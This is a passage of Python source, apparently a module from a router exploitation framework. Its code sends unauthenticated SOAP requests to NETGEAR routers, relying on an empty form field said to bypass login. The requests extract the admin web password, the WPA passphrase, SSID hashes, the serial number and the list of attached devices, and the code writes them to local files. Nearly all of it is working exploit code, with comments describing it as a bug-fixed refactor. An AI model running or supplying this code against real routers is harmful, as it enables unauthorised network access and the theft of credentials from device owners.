        for pattern, label, failure in wanted:
            found = re.search(pattern, result)
            if not found:
                continue
            try:
                line = label + found.group(1)
                if pattern == "device::mac_addr=(.*)":
                    # Only the MAC line gets the lookup_mac() suffix.
                    line = line + lookup_mac(found.group(1))
                print_green(line)
            except IndexError:
                print_error(failure)
    print_yellow("Sending payload getstinfo")
    result = self.send_payload("getstinfo.cgi")
    if result:
        print_green("Got SSID hash and passphrase hash, writing to file")
        core.io.writetextfile(result, "getstinfo")
        print_green(result)
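def do_run(self, e):
    """Query five SOAP actions on the device root URL and print the parsed fields.

    Each request is a POST to ``http://host:port/`` with a ``SOAPAction`` header
    and an empty form field. The raw reply is saved to an XML file in the
    working directory and selected tags are printed: device description, serial
    number, firmware version, web UI password, SSID, encryption mode, WPA
    passphrase and the attached-device list.

    Fixes over the original: a tag missing from a reply made ``re.search``
    return ``None`` and the resulting ``AttributeError`` escaped the
    ``except IndexError`` handlers; the connection-error handler concatenated a
    ``str`` with the exception object and raised ``TypeError``. The five
    repeated request stanzas are folded into two local helpers.

    Handling note: the saved XML files and the terminal output contain
    credentials in clear text.

    Args:
        e: Unused by this method.
    """
    url = "http://%s:%s/" % (self.host, self.port)
    payload = {"": ""}  # Per the original author, the empty form is what skips authentication
    # Tags are stripped with a regex instead of an XML parser (original design
    # choice, made to avoid an extra dependency).
    striptag = re.compile(r'<.*?>')
    parse_errors = (AttributeError, IndexError)

    def fetch(action, filename):
        """POST one SOAPAction, save the reply to *filename*, return its text."""
        response = requests.post(url, headers={"SOAPAction": action}, data=payload, timeout=60)
        if response.status_code != 200:
            raise requests.ConnectionError
        print_yellow("Writing response to %s" % filename)
        core.io.writetextfile(response.text, filename)
        print_yellow("Parsing response")
        return response.text

    def field(tag, text):
        """Return the tag-stripped rest of the line after ``<tag>``; raises if absent."""
        return striptag.sub('', re.search("<%s>(.*)" % tag, text).group(1))

    try:
        print_yellow("Sending exploit")

        # Request DeviceInfo
        text = fetch("urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo", "DeviceInfo.xml")
        try:
            description = field("Description", text)
            serial_number = field("SerialNumber", text)
            firmware = field("Firmwareversion", text)
            print_green("Device: %s" % description)
            print_green("Serial number: %s" % serial_number)
            print_green("FW version: %s" % firmware)
        except parse_errors:
            print_error("opps unable to locate this regular expression")

        # Request web UI password
        text = fetch("urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo", "LANConfigSecurity.xml")
        try:
            print_green("Password: %s" % field("NewPassword", text))
        except parse_errors:
            print_error("opps unable to locate this regular expression")

        # Request WLAN info
        text = fetch("urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetInfo", "WLANConfiguration.xml")
        try:
            ssid = field("NewSSID", text)
            wlan_encryption = field("NewBasicEncryptionModes", text)
            print_green("SSID: " + ssid)
            print_green("Encryption: %s" % wlan_encryption)
        except parse_errors:
            print_error("opps unable to locate this regular expression")

        # Wlan password
        text = fetch("urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetWPASecurityKeys",
                     "WLANConfigurationGetWPASecurityKeys.xml")
        try:
            print_green("Passphrase: %s" % field("NewWPAPassphrase", text))
        except parse_errors:
            print_error("opps unable to locate this regular expression")

        # Attached devices
        text = fetch("urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetAttachDevice",
                     "DeviceInfoGetAttachDevice.xml")
        try:
            devices = field("NewAttachDevice", text).split('@')[1:]  # First element is number of records
            for device in devices:
                device = device.split(";")
                print_green("ID: %s" % device[0])
                print_green("IP: %s" % device[1])
                print_green("Name: %s" % device[2])
                print_green("MAC: %s" % interface.utils.lookup_mac(device[3]))
                print_green("Connection type: %s" % device[4])
        except parse_errors:
            print_error("opps unable to locate this regular expression")
    # Handler order matters: a connect timeout derives from both exception types.
    except requests.ConnectionError as err:
        print_error("lost connection %s" % err)
    except requests.Timeout:
        print_error("timeout")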